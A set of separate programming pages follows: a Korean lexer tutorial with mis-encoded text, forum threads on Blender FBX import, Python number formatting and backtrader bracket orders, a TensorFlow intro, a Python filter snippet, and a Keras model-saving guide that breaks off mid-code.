DOT = auto() # .
PLUS = auto() # +
MINUS = auto() # -
STAR = auto() # *
SLASH = auto() # /
EQUAL = auto() # =
EQUAL_EQUAL = auto() # ==
EXCLAM = auto() # !
EXCLAM_EQUAL = auto() # !=
GREATER = auto() # >
GREATER_EQUAL = auto() # >=
LESS = auto() # <
LESS_EQUAL = auto() # <=
IDENTIFIER = auto() # Variable name, Function name, etc... ([a-zA-Z][a-zA-Z0-9]*)
BOOLEAN = auto() # true, false
NUMBER = auto() # Digit([0-9]+(.[0-9]*)?)
SINGLE_STRING = auto() # 'string'
DOUBLE_STRING = auto() # "string"
EOF = auto() # End of file
# Keywords
IF = 'if'
ELSE = 'else'
AND = 'and'
OR = 'or'
FUN = 'fun'
VAR = 'var'
TRUE = 'true'
FALSE = 'false'
NULL = 'null'
FOR = 'for'
WHILE = 'while'
IN = 'in'
RETURN = 'return'
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
ë§ì§ë§ì has_value ë©ìëë Lexer를 구íí ë í¤ìë를 ê°ì ¸ì¬ë ì¬ì©ë©ëë¤.
ì¼ë¨ Lexer í´ëì¤ë¥¼ ìì±í´ì¤ëë¤.
class Lexer:
def __init__(self, source: str):
self.source = source # 소스 코드
self.tokens = [] # íŒŒì‹±ëœ í† í°
self.start = 0 # í† í°ì˜ 시작
self.current = 0 # í† í°ì˜ ë
self.line = 1 # ë¼ì¸
scan_token ë©ìë
í í° íë를 ë¶ìíë scan_token ë©ìë를 ë§ë¤ì´ë´
ìë¤.
def scan_token(self) -> None:
ch = self.advance()
if ch == '(':
self.add_token(TokenType.LEFT_PAREN)
elif ch == ')':
self.add_token(TokenType.RIGHT_PAREN)
elif ch == '{':
self.add_token(TokenType.LEFT_BRACE)
# ...
elif ch == '!':
self.add_token(TokenType.EXCLAM_EQUAL if self.match('=') else TokenType.EXCLAM)
elif ch == '=':
self.add_token(TokenType.EQUAL_EQUAL if self.match('=') else TokenType.EQUAL)
elif ch == '<':
self.add_token(TokenType.LESS_EQUAL if self.match('=') else TokenType.LESS)
elif ch == '>':
self.add_token(TokenType.GREATER_EQUAL if self.match('=') else TokenType.GREATER)
elif ch == '/':
if self.match('/'):
while self.peek() != '\n' and not self.is_end():
self.advance()
else:
self.add_token(TokenType.SLASH)
elif ch.isspace():
pass
elif ch == '\n':
self.line += 1
elif ch == '"' or ch == '\'':
while self.peek() != ch and not self.is_end():
if self.peek() == '\n':
self.line += 1
self.advance()
if self.is_end():
raise InvalidSyntaxError('Unterminated string')
self.advance()
self.add_token(
TokenType.DOUBLE_STRING if ch == '"' else TokenType.SINGLE_STRING,
self.source[self.start: self.current].strip(ch)
)
elif Lexer.is_digit(ch):
while Lexer.is_digit(self.peek()):
self.advance()
if self.peek() == '.':
self.advance()
while Lexer.is_digit(self.peek()):
self.advance()
self.add_token(TokenType.NUMBER, float(self.source[self.start: self.current]))
elif ch.isalpha():
while self.peek() and self.peek().isalnum():
self.advance()
text = self.source[self.start: self.current]
if TokenType.has_value(text):
self.add_token(TokenType(text))
else:
self.add_token(TokenType.IDENTIFIER)
else:
raise InvalidSyntaxError('Unexpected token: ' + ch)
lex ë©ìë
ê·¸ë¦¬ê³ ì´ í í° ì°¾ë ê²ì ìì¤ì½ëê° ëë ëê¹ì§ ë°ë³µí´ì£¼ë lex ë©ìë를 ë§ë¤ì´ ë´
ìë¤.
def lex(self) -> List[Token]:
while not self.is_end():
self.start = self.current
self.scan_token()
self.tokens.append(Token(TokenType.EOF, ''))
return self.tokens
ì´ê²ì´ ê°ëµíê² ì¤ì ë©ìë를 ìê°í ê²ì´ë©°, ìì¸í ì½ëë ì¬ê¸°ë¥¼ ì°¸ê³ íë©´ ë ê² ê°ìµëë¤.
from rectapy import Lexer
if __name__ == '__main__':
lexer = Lexer('10*2+3')
tokens = lexer.lex()
print('\n'.join(map(str, tokens)))
ì¼ë¨ ìì¤ì½ë를 ë£ì ìíìì Lexer í´ëì¤ë¥¼ ë§ë¤ê³ lexí 결과를 ì¶ë ¥íëë¡ íìµëë¤.
NUMBER 10 10.0STAR * NUMBER 2 2.0PLUS + NUMBER 3 3.0EOF
ì±ê³µì ì´êµ°ì! ì´ì ë¤ììë ìê¹ ë§íë¯ì´ ASTë¼ê³ ë¶ë¦¬ë Parser를 ì§ì Abstract Syntax Tree를 ë§ë¤ì´ë³¼ê±°ìì!
|
I am trying to import this model from Unity Store https://assetstore.unity.com/packages/3d/characters/humanoids/amanda-frost-34583 but it does not show up in the project.
Console does not output any errors:
\Amanda\amandaModel.fbx
FBX version: 7400
FBX import: Prepare...
Done (0.000000 sec)
FBX import: Templates...
Done (0.000000 sec)
FBX import: Nodes...
Done (0.000000 sec)
FBX import: Connections...
Done (0.000000 sec)
FBX import: Meshes...
Done (0.000000 sec)
FBX import: Materials & Textures...
Done (0.000000 sec)
FBX import: Cameras & Lamps...
Done (0.000000 sec)
FBX import: Objects & Armatures...
Done (0.000000 sec)
FBX import: ShapeKeys...
Done (0.000000 sec)
FBX import: Animations...
Done (0.000000 sec)
FBX import: Assign materials...
Done (0.000000 sec)
FBX import: Assign textures...
Done (0.000000 sec)
FBX import: Cycles z-offset workaround...
Done (0.000000 sec)
Done (0.000000 sec)
Blender 2.79b
Am I doing something wrong?
|
Witam,
Jak sformatować liczby, aby wyświetlały się w postaci pogrupowanej np. 123 456 789 ?
Nie znalazłem tego na https://pyformat.info , ani na forum.
Pozdrawiam
0
Witam,
1
{:,} użyje przecinka jako separatora (więc wyświetli 123,456,789), którego można potem ręcznie zamienić na spację (ale, na bogów, nierozdzielającą — nie ma nic bardziej irytującego, niż liczba przełamana w połowie na końcu linii…).
{:n} sformatuje wg locale’i, przy czym polskie akurat z jakiegoś powodu nie mają spacji jako separatora, a nie można tego zmieniać w locie, z tego co wiem.
EDYCJA: albo coś się zmieniło, albo ja źle zapamiętałem — bo mi Python 3.7 już elegancko ma spację nierozdzielającą w pl_PL jako separator.
0
taki zapis:
print("| {:>5n} | {:.>26n} | {:.>22n} |" .format (i+1,b,c))
dał mi taki wynik:
14 | ......................8192 | .................16383 |
Czyli kropka w {:.} dodała kropki przed cyfrą. Z przecinkiem jest to samo.
Mi nie chodzi o separator kilku liczb, ale rozdzielenie cyfr jednej liczby dla większej czytelności.
3
Akurat ci się trafiło że coś takiego pisałem dziś na przykład, na innym forum :D.
import textwrap
variable_int = 14819216383 #Twoja liczba
variable_with_spaces = " ".join(digit for digit in textwrap.wrap(str(variable_int)[::-1], 3))[::-1]
print(variable_with_spaces) #14 819 216 383
Inny sposób podziału który nie jest już ciągłym obracaniem napisu, co powinno być szybsze:
>>> variable_int = 14819216383 #Twoja liczba
>>> v = str(variable_int)
>>> i = len(v)
>>> temp = ""
>>> while i > 2:
... temp = " " + v[i-3:i] + temp
... i -= 3
... print(temp)
... else:
... temp = v[0:2] + temp
... print(temp)
...
383
216 383
819 216 383
14 819 216 383
Bez kombinowania, czytelniej: (Jeśli chcesz odstęp co 3 cyfry od końca)
variable_int = 14819216383 #Twoja liczba
print("{:,}".format(variable_int).replace(",", " ")
To ci wrzuci spacje pomiędzy, możesz sobie to ewentualnie podzielić na elementy listy .split() albo coś innego kombinować :).
Może nie jest to najszybsze rozwiązanie, bo są lepsze - nie jednoliniowe (Nie wiem które z powyższych będzie szybsze, format różnie działa). Ale to zawsze jakiś początek, problem jest w tym, że jeśli byś chciał to zrobić formatem, musiałbyś sobie najpierw to przygotować:
import textwrap
variable_int = 14819216383
variable_divided = "{:,}".format(variable_int).split(",")
your_string = "{:10} {:10} {:10} {:10}".format(*variable_divided)) # Tylko musisz wiedzieć na ile została podzielona, dlatego polecałbym bardziej formatowanego joina.
###
>>> your_string
' 14 819 216 383'
Przykład 'dynamicznego rozmiaru' format/join:
>>> your_string = "{:10}|".join("" for _ in range(len(variable_divided))).format(*variable_divided)
>>> your_string
' 14| 819| 216|'
Twój temp przechowuje na koniec już ładnie sformatowaną liczbę, printy zostawiłem by było widać co się w środku dzieje :D.
I else tam nie potrzebny w sumie, bo nie ma break'a, ale pisałem z palca i mnie poniosło :).
>>> v = 14819216383 #Twoja liczba
>>> list_str_v = "{:,}".format(v).split(",")
>>> list_str_v
['14', '819', '216', '383']
>>> your_string = "{:>10}|".join("" for _ in range(len(list_str_v))).format(*list_str_v)
>>> your_string
' 14| 819| 216|'
Podałeś na początku trochę za mało danych aby kolega wyżej mógł ci prawidłowo udzielić odpowiedzi :)
Łącząc kropki z twoim przykładem:
def convert(v):
return "{:,}".format(v).replace(",", " ")
print("| {:>5n} | {:>26n} | {:>22n} |" .format (convert(i+1),convert(b),convert(c)))
To powinno być tym czego szukasz, ale być może przykłady powyżej też się komuś przydadzą w tym zagadnieniu.
0
Dodam od siebie, ze warto zapamiętać powyższe informacje, ponieważ kiedyś na rozmowie o prace miałem podobne zadanie:) Co prawda było to zadanie tekstowe, ale sprowadzało się właśnie do znalezienia w ciągu znaków cyfr a potem podzielenie ich na grupy i zwrócenie stringa z tymi grupkami oddzielonymi spacją :)
|
2020/01/09
import tensorflow as tf hello = tf.constant("Hello, TensorFlow!") sess = tf.Session() print(sess.run(hello))
위의 코드는 우리가 프로그래밍을 배우면서 가장 흔히 알고, 가장 기본적인 hello world를 텐서플로에서 실행하는 코드이다.정말 간단하지만, 나 스스로도 텐서플로와 머신러닝을 처음 접하기 때문에, 하나하나 살펴보자면tensorflow 를 import 하여 tf라는 이름으로 사용하기로 했었다.tf.constant라는 함수를 호출하여 "Hello, TensorFlow!"라는 문자열을 hello라는 변수에 저장하는 것이다.이렇게 되면 앞서 배운 것과 같이 아무 Edge도 없는 Data Flow Graph에 hello라는 이름의 하나의 노드 가 생긴 것이다.여기서 그냥 출력을 해도 되지만, Computational Graph를 실행하기 위해서는 Session이라는 것을 만들어야 하고이 세션을 통해 .run을 호출하여 sess라는 이름의 텐서플로 세션을 통해 hello라는 노드를 실헹하겠다는 것을 의미한다.
이러한 과정을 통해 출력된 결과는 다음과 같다.
b'Hello, TesorFlow!'
여기서 b는 Byte literals라는 것임을 의미한다.바이트 스트링에 대한 자세한 예는 이 곳에 나와있다고 한다.
다음 예제는 위와 같은 Computational Graph를 구현하는 것이다.a라는 노드와 b라는 노드를 하나의 다른 노드로 연결시키는 것이다.아래와 같이 작성해보자.
node1 = tf.constant(3.0, tf.float32) node2 = tf.constant(4.0) #also tf.float32 implicitly node3 = tf.add(node1, node2) #node3 = node1 + node2 print("node1:", node1, "node2:", node2) print("node3:", node3)
이에 대한 출력 결과는 아래와 같다.
node1: Tensor("Const_1:0, shape=(), dtype=float32) node2: Tensor("Const_2:0, shape=(), dtype=float32) node3: Tensor("Add:0, shape=(), dtype=float32)
이를 출력하면 텐서플로가 이들은 그저 그래프 안의 요소(Tensor)라고 대답한다.일반적인 경우처럼 연산에 대한 결과값이 나오는 것이 아니라, 각 Tensor들의 속성에 대한 정보만 출력한다.
그렇다면 연산을 실행하려면 어떻게 해야할까?
앞서 Hello TensorFlow!를 출력했던 것과 같이 Session을 만들어 주어야 한다.
sess = tf.Session() print("sess.run([node1, node2]): ", sess.run([node1, node2])) print("sess.run(node3): ", sess.run(node3))
이렇게 작성해야 비로소 우리가 얻고 싶은 결과를 얻을 수 있다.
sess.run([node1, node2]): [3.0, 4.0] sess.run(node3): 7.0
여기까지 공부하면서, 우리는 다음과 같이 정리해볼 수 있다.
텐서플로우는 기존에 우리가 생각하는 프로그램과 약간 다르게 동작한다.
sess.run을 통해 data를 넣은 뒤 우리가 만든 update되거나, 어떠한 값을 return하게 된다.
그래프는 미리 만들어두고 실행시키는 단계에서 입력을 줄 수는 없을까?
a = tf.placeholder(tf.float32) b = tf.placeholder(tf.float32) adder_node = a + b print(sess.run(adder_node, feed_dict={a: 3, b:4.5})) print(sess.run(adder_node, feed_dict={a: [1, 3], b: [2,4]}))
7.5[ 3. 7. ]
이처럼 placeholder를 활용하여 처음에 값을 지정하지 않은 노드를 만들 수 있고,feed_dict를 통해 sess.run을 실행하는 과정 중에 동적으로 값을 전달할 수 있다. sess.run(op, feed_dict={x: x_data}) 와 같은 용법으로 사용할 수 있다.
Tensor란 그래서 정확히 무엇인가?
기본적으로 배열로 표현되는 모든 것이 Tensor라고 한다.
Tensor는 Rank, Shape, Types 로 나누어 이야기 할 수 있는데,
Rank란 몇 차원 배열이냐 라는 의미에 해당한다.
s = 483 은 Rank 0이며 수학적으로는
Shape란 각 Element에 몇 개씩 들어있는가?
[ [ [1,2,3],[4,5,6] ], [ [7,8,9],[10,11,12] ]]
Type이란 말 그대로 data type을 말한다.
tf.float32, tf.int32를 주로 사용한다고 한다.
내용이 조금 길어지는 것 같아서 나누어 다루어야 할 것 같다.실습 한 강좌인데 정리하면서 들으려니까 왜이렇게 오래걸리는지…
|
```(aka backtick or grave accent) in a single line before and after the block. See: http://commonmark.org/help/
Entering and taking profit on the same bar
for simple MA crossover strategy, when an order is created, if the next bar triggers the entry but simultaneously hits the target, it will only execute the entry and then exit the bar after that on the open. I can't figure it out. I've been trying different order types but I haven't been able to change the behavior. I've experimented with cheat on open but that didn't get me anywhere
class Order_testing(bt.Strategy):
params = dict(
pfast=10, # period for the fast moving average
pslow=30 # period for the slow moving average
)
def log(self, txt, dt=None):
''' Logging function for this strategy'''
dt = dt or self.datas[0].datetime.datetime(0)
print('%s, %s' % (dt.strftime("%Y-%m-%d %H:%M"), txt))
def __init__(self):
sma1 = bt.ind.SMA(period=self.p.pfast) # fast moving average
sma2 = bt.ind.SMA(period=self.p.pslow) # slow moving average
self.crossover = bt.ind.CrossOver(sma1, sma2) # crossover signal
# To keep track of pending orders and buy price/commission
self.order = None
self.buyprice = None
self.buycomm = None
def notify_order(self, order):
if order.status in [order.Submitted, order.Accepted]:
# Buy/Sell order submitted/accepted to/by broker - Nothing to do
return
# Check if an order has been completed
# Attention: broker could reject order if not enough cash
if order.status in [order.Completed]:
if order.isbuy():
self.log(
'BUY EXECUTED, Price: %.5f, Cost: %.f, Comm %.2f' %
(order.executed.price,
order.executed.value,
order.executed.comm))
self.buyprice = order.executed.price
self.buycomm = order.executed.comm
else: # Sell
self.log('SELL EXECUTED, Price: %.5f, Cost: %.f, Comm %.2f' %
(order.executed.price,
order.executed.value,
order.executed.comm))
self.bar_executed = len(self)
elif order.status in [order.Canceled, order.Margin, order.Rejected]:
self.log('Order Canceled/Margin/Rejected')
self.order = None
def notify_trade(self, trade):
if not trade.isclosed:
return
self.log('OPERATION PROFIT, GROSS %.5f, NET %.5f' %
(trade.pnl, trade.pnlcomm))
def next(self):
# Check if an order is pending ... if yes, we cannot send a 2nd one
if self.order:
if self.order.status == 2 and len(self) == self.bar_order_submitted + 1:
self.broker.cancel(self.order)
self.log("order was cancelled")
# Check if we are in the market
if not self.position:
# Not yet ... we MIGHT BUY if ...
if self.crossover > 0: # if fast crosses slow to the upside
self.order = self.buy(exectype=bt.Order.StopLimit, price=self.data.high[0], transmit=False)
self.StopLoss = self.sell(price=self.data.low[0],exectype=bt.Order.Stop,
transmit=False, size=self.order.size,parent=self.order)
self.target = self.sell(price=(self.data.high[0]-self.data.low[0])*1.1+self.data.high[0], exectype=bt.Order.Limit,
transmit=True, size=self.order.size, parent=self.order)
self.bar_order_submitted = len(self)
self.log('BUY CREATE, %.5f' % self.order.price)
self.log('SL: %.5f, T: %.5f' %(self.StopLoss.price,self.target.price))
if __name__ == '__main__':
cerebro = bt.Cerebro()
# Add a strategy
cerebro.addstrategy(Order_testing)
# Create a Data Feed
data = bt.feeds.PandasData(dataname=df2020)
one_minute = cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=1)
# Print out the starting conditions
print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())
cerebro.run()
# Print out the final result
print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
log for reference. it should both execute the buy and sell order at 06:29
2020-08-12 06:28, BUY CREATE, 1.17185
2020-08-12 06:28, SL: 1.17171, T: 1.17200
2020-08-12 06:29, BUY EXECUTED, Price: 1.17185, Cost: 1, Comm 0.00
2020-08-12 06:30, SELL EXECUTED, Price: 1.17203, Cost: 1, Comm 0.00
2020-08-12 06:30, Order Canceled/Margin/Rejected
2020-08-12 06:30, OPERATION PROFIT, GROSS 0.00018, NET 0.00018
I am not really sure with this. Maybe the
quicknotifyparam could help you with that problem.
@dasch much appreciate the quick response. I've tried it but it doesn't work. I haven't found any posts on the forum where it was mentioned either unfortunately.
could you post the data file to play with that problem a bit?
I would but I can't see how to add an attachment? if not possible, I'll add it to dropbox and then send it that way
you can send it directly to my email, which is available in my profile
run-outlast edited by
if the next bar triggers the entry but simultaneously hits the target, it will only execute the entry and then exit the bar after that on the open.
This is default behaviour since it is impossible to know for sure what order the triggers for enter and sale happen when using just one bar of data. Perhaps the enter price happens just before the close but the stop price happens near the open. It's problematic. If you wish to have greater granularity you may wish to consider using a smaller time frame, or perhaps replay.
@run-out you are right. we went through this yesterday via email. The result was like you explained. The child order gets activated after the parent order gets executed and will be checked in next cycle.
One way to manually allow executing on the same bar is to activate the child order by hand.
after the order was created:
self.target.activate()
Which is not that good idea, since then you don't know, if the parent order was executed, too.
I agree and I understand the logic. I can't replay but also, it's useful to use target.activate() and it can be used to do only in certain scenarios where it looks most likely the target would have been hit. for example if the price never even reached the stoploss but got to the entry and then the target, it's perfectly fine to use it. in case of a big outside bar which would hit all three entry, target and stoploss there would be doubt but it's more an exceptional case.
thanks again for your help Dasch
|
La funzione filter in Python ci permette di filtrare una lista, restituendone un'altra.
Il tutto attraverso una funzione di callback; questo fa si che non dobbiamo iterare su tutti gli elementi di una lista.
Se ne occuperà filter.
Vediamo un esempio:
def inizia_con(str):
return str[0] == "M"
nomi = ["Michela", "Matteo", "mirko", "Alessandra", "Francesca"]
filtro = filter(inizia_con, nomi)
print(list(filtro))
Notate che il nome mirko comincia con la minuscola, e quindi verrà escluso dalla lista.
Enjoy!
python filter
|
View on TensorFlow.org Run in Google Colab View source on GitHub Download notebook
Introduction
A Keras model consists of multiple components:
An architecture, or configuration, which specifies what layers the model contain, and how they're connected.
A set of weights values (the "state of the model").
An optimizer (defined by compiling the model).
A set of losses and metrics (defined by compiling the model or callingadd_loss()oradd_metric()).
The Keras API makes it possible to save all of these pieces to disk at once, or to only selectively save some of them:
Saving everything into a single archive in the TensorFlow SavedModel format (or in the older Keras H5 format). This is the standard practice.
Saving the architecture / configuration only, typically as a JSON file.
Saving the weights values only. This is generally used when training the model.
Let's take a look at each of these options: when would you use one or the other? How do they work?
The short answer to saving & loading
If you only have 10 seconds to read this guide, here's what you need to know.
Saving a Keras model:
model = ... # Get model (Sequential, Functional Model, or Model subclass)
model.save('path/to/location')
Loading the model back:
from tensorflow import keras
model = keras.models.load_model('path/to/location')
Now, let's look at the details.
Setup
import numpy as np
import tensorflow as tf
from tensorflow import keras
Whole-model saving & loading
You can save an entire model to a single artifact. It will include:
The model's architecture/config
The model's weight values (which were learned during training)
The model's compilation information (if compile()) was called
The optimizer and its state, if any (this enables you to restart training where you left)
APIs
There are two formats you can use to save an entire model to disk:the TensorFlow SavedModel format, and the older Keras H5 format.The recommended format is SavedModel. It is the default when you use model.save().
You can switch to the H5 format by:
Passing save_format='h5'tosave().
Passing a filename that ends in .h5or.kerastosave().
SavedModel format
Example:
def get_model():
# Create a simple model.
inputs = keras.Input(shape=(32,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
model.compile(optimizer="adam", loss="mean_squared_error")
return model
model = get_model()
# Train the model.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_model')` creates a SavedModel folder `my_model`.
model.save("my_model")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_model")
# Let's check:
np.testing.assert_allclose(
model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
4/4 [==============================] - 1s 2ms/step - loss: 0.4642 INFO:tensorflow:Assets written to: my_model/assets 4/4 [==============================] - 0s 2ms/step - loss: 0.4149 <tensorflow.python.keras.callbacks.History at 0x7f067c6f7898>
What the SavedModel contains
Calling model.save('my_model') creates a folder named my_model,containing the following:
ls my_model
assets saved_model.pb variables
The model architecture, and training configuration(including the optimizer, losses, and metrics) are stored in saved_model.pb.The weights are saved in the variables/ directory.
For detailed information on the SavedModel format, see theSavedModel guide (The SavedModel format on disk).
How SavedModel handles custom objects
When saving the model and its layers, the SavedModel format stores theclass name, call function, losses, and weights (and the config, if implemented).The call function defines the computation graph of the model/layer.
In the absence of the model/layer config, the call function is used to create a model that exists like the original model which can be trained, evaluated, and used for inference.
Nevertheless, it is always a good practice to define the get_configand from_config methods when writing a custom model or layer class.This allows you to easily update the computation later if needed.See the section about Custom objectsfor more information.
Below is an example of what happens when loading custom layers fromhe SavedModel format without overwriting the config methods.
class CustomModel(keras.Model):
def __init__(self, hidden_units):
super(CustomModel, self).__init__()
self.dense_layers = [keras.layers.Dense(u) for u in hidden_units]
def call(self, inputs):
x = inputs
for layer in self.dense_layers:
x = layer(x)
return x
model = CustomModel([16, 16, 10])
# Build the model by calling it
input_arr = tf.random.uniform((1, 5))
outputs = model(input_arr)
model.save("my_model")
# Delete the custom-defined model class to ensure that the loader does not have
# access to it.
del CustomModel
loaded = keras.models.load_model("my_model")
np.testing.assert_allclose(loaded(input_arr), outputs)
print("Original model:", model)
print("Loaded model:", loaded)
INFO:tensorflow:Assets written to: my_model/assets WARNING:tensorflow:No training configuration found in save file, so the model was *not* compiled. Compile it manually. Original model: <__main__.CustomModel object at 0x7f067c6e24e0> Loaded model: <tensorflow.python.keras.saving.saved_model.load.CustomModel object at 0x7f071ffdf4e0>
As seen in the example above, the loader dynamically creates a new model class that acts like the original model.
Keras H5 format
Keras also supports saving a single HDF5 file containing the model's architecture,weights values, and compile() information.It is a light-weight alternative to SavedModel.
Example:
model = get_model()
# Train the model.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_model.h5')` creates a h5 file `my_model.h5`.
model.save("my_h5_model.h5")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_h5_model.h5")
# Let's check:
np.testing.assert_allclose(
model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
4/4 [==============================] - 0s 2ms/step - loss: 2.2634 4/4 [==============================] - 0s 2ms/step - loss: 1.9743 <tensorflow.python.keras.callbacks.History at 0x7f071edcf400>
Limitations
Compared to the SavedModel format, there are two things that don't get included in the H5 file:
External losses & metricsadded viamodel.add_loss()&model.add_metric()are not saved (unlike SavedModel). If you have such losses & metrics on your model and you want to resume training, you need to add these losses back yourself after loading the model. Note that this does not apply to losses/metrics createdinsidelayers viaself.add_loss()&self.add_metric(). As long as the layer gets loaded, these losses & metrics are kept, since they are part of thecallmethod of the layer.
The computation graph of custom objectssuch as custom layers is not included in the saved file. At loading time, Keras will need access to the Python classes/functions of these objects in order to reconstruct the model. See Custom objects.
Saving the architecture
The model's configuration (or architecture) specifies what layers the model contains, and how these layers are connected*. If you have the configuration of a model, then the model can be created with a freshly initialized state for the weights and no compilation information.
*Note this only applies to models defined using the functional or Sequential apis not subclassed models.
Configuration of a Sequential model or Functional API model
These types of models are explicit graphs of layers: their configuration is always available in a structured form.
APIs
get_config()andfrom_config()
tf.keras.models.model_to_json()andtf.keras.models.model_from_json()
get_config() and from_config()
Calling config = model.get_config() will return a Python dict containingthe configuration of the model. The same model can then be reconstructed viaSequential.from_config(config) (for a Sequential model) orModel.from_config(config) (for a Functional API model).
The same workflow also works for any serializable layer.
Layer example:
layer = keras.layers.Dense(3, activation="relu")
layer_config = layer.get_config()
new_layer = keras.layers.Dense.from_config(layer_config)
Sequential model example:
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
config = model.get_config()
new_model = keras.Sequential.from_config(config)
Functional model example:
inputs = keras.Input((32,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(config)
to_json() and tf.keras.models.model_from_json()
This is similar to get_config / from_config, except it turns the modelinto a JSON string, which can then be loaded without the original model class.It is also specific to models, it isn't meant for layers.
Example:
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
json_config = model.to_json()
new_model = keras.models.model_from_json(json_config)
Custom objects
Models and layers
The architecture of subclassed models and layers are defined in the methods__init__ and call. They are considered Python bytecode,which cannot be serialized into a JSON-compatible config-- you could try serializing the bytecode (e.g. via pickle),but it's completely unsafe and means your model cannot be loaded on a different system.
In order to save/load a model with custom-defined layers, or a subclassed model,you should overwrite the get_config and optionally from_config methods.Additionally, you should use register the custom object so that Keras is aware of it.
Custom functions
Custom-defined functions (e.g. activation loss or initialization) do not needa get_config method. The function name is sufficient for loading as longas it is registered as a custom object.
Loading the TensorFlow graph only
It's possible to load the TensorFlow graph generated by the Keras. If youdo so, you won't need to provide any custom_objects. You can do so likethis:
model.save("my_model")
tensorflow_graph = tf.saved_model.load("my_model")
x = np.random.uniform(size=(4, 32)).astype(np.float32)
predicted = tensorflow_graph(x).numpy()
INFO:tensorflow:Assets written to: my_model/assets
Note that this method has several drawbacks:
For traceability reasons, you should always have access to the custom objects that were used. You wouldn't want to put in production a model that you cannot re-create.
The object returned by tf.saved_model.loadisn't a Keras model. So it's not as easy to use. For example, you won't have access to.predict()or.fit()
Even if its use is discouraged, it can help you if you're in a tight spot,for example, if you lost the code of your custom objects or have issuesloading the model with tf.keras.models.load_model().
You can find out more inthe page about tf.saved_model.load
Defining the config methods
Specifications:
get_configshould return a JSON-serializable dictionary in order to be compatible with the Keras architecture- and model-saving APIs.
from_config(config)(classmethod) should return a new layer or model object that is created from the config. The default implementation returnscls(**config).
Example:
class CustomLayer(keras.layers.Layer):
def __init__(self, a):
self.var = tf.Variable(a, name="var_a")
def call(self, inputs, training=False):
if training:
return inputs * self.var
else:
return inputs
def get_config(self):
return {"a": self.var.numpy()}
# There's actually no need to define `from_config` here, since returning
# `cls(**config)` is the default behavior.
@classmethod
def from_config(cls, config):
return cls(**config)
layer = CustomLayer(5)
layer.var.assign(2)
serialized_layer = keras.layers.serialize(layer)
new_layer = keras.layers.deserialize(
serialized_layer, custom_objects={"CustomLayer": CustomLayer}
)
Registering the custom object
Keras keeps a note of which class generated the config.From the example above, tf.keras.layers.serializegenerates a serialized form of the custom layer:
{'class_name': 'CustomLayer', 'config': {'a': 2} }
Keras keeps a master list of all built-in layer, model, optimizer,and metric classes, which is used to find the correct class to call from_config.If the class can't be found, then an error is raised (Value Error: Unknown layer).There are a few ways to register custom classes to this list:
Setting custom_objectsargument in the loading function. (see the example in section above "Defining the config methods")
tf.keras.utils.custom_object_scopeortf.keras.utils.CustomObjectScope
tf.keras.utils.register_keras_serializable
Custom layer and function example
class CustomLayer(keras.layers.Layer):
def __init__(self, units=32, **kwargs):
super(CustomLayer, self).__init__(**kwargs)
self.units = units
def build(self, input_shape):
self.w = self.add_weight(
shape=(input_shape[-1], self.units),
initializer="random_normal",
trainable=True,
)
self.b = self.add_weight(
shape=(self.units,), initializer="random_normal", trainable=True
)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
config = super(CustomLayer, self).get_config()
config.update({"units": self.units})
return config
def custom_activation(x):
return tf.nn.tanh(x) ** 2
# Make a model with the CustomLayer and custom_activation
inputs = keras.Input((32,))
x = CustomLayer(32)(inputs)
outputs = keras.layers.Activation(custom_activation)(x)
model = keras.Model(inputs, outputs)
# Retrieve the config
config = model.get_config()
# At loading time, register the custom objects with a `custom_object_scope`:
custom_objects = {"CustomLayer": CustomLayer, "custom_activation": custom_activation}
with keras.utils.custom_object_scope(custom_objects):
new_model = keras.Model.from_config(config)
In-memory model cloning
You can also do in-memory cloning of a model via tf.keras.models.clone_model().This is equivalent to getting the config then recreating the model from its config(so it does not preserve compilation information or layer weights values).
Example:
with keras.utils.custom_object_scope(custom_objects):
new_model = keras.models.clone_model(model)
Saving & loading only the model's weights values
You can choose to only save & load a model's weights. This can be useful if:
You only need the model for inference: in this case you won't need to restart training, so you don't need the compilation information or optimizer state.
You are doing transfer learning: in this case you will be training a new model reusing the state of a prior model, so you don't need the compilation information of the prior model.
APIs for in-memory weight transfer
Weights can be copied between different objects by using get_weightsand set_weights:
tf.keras.layers.Layer.get_weights(): Returns a list of numpy arrays.
tf.keras.layers.Layer.set_weights(): Sets the model weights to the values in theweightsargument.
Examples below.
Transfering weights from one layer to another, in memory
def create_layer():
layer = keras.layers.Dense(64, activation="relu", name="dense_2")
layer.build((None, 784))
return layer
layer_1 = create_layer()
layer_2 = create_layer()
# Copy weights from layer 2 to layer 1
layer_2.set_weights(layer_1.get_weights())
Transfering weights from one model to another model with acompatible architecture, in memory
# Create a simple functional model
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
# Define a subclassed model with the same architecture
class SubclassedModel(keras.Model):
def __init__(self, output_dim, name=None):
super(SubclassedModel, self).__init__(name=name)
self.output_dim = output_dim
self.dense_1 = keras.layers.Dense(64, activation="relu", name="dense_1")
self.dense_2 = keras.layers.Dense(64, activation="relu", name="dense_2")
self.dense_3 = keras.layers.Dense(output_dim, name="predictions")
def call(self, inputs):
x = self.dense_1(inputs)
x = self.dense_2(x)
x = self.dense_3(x)
return x
def get_config(self):
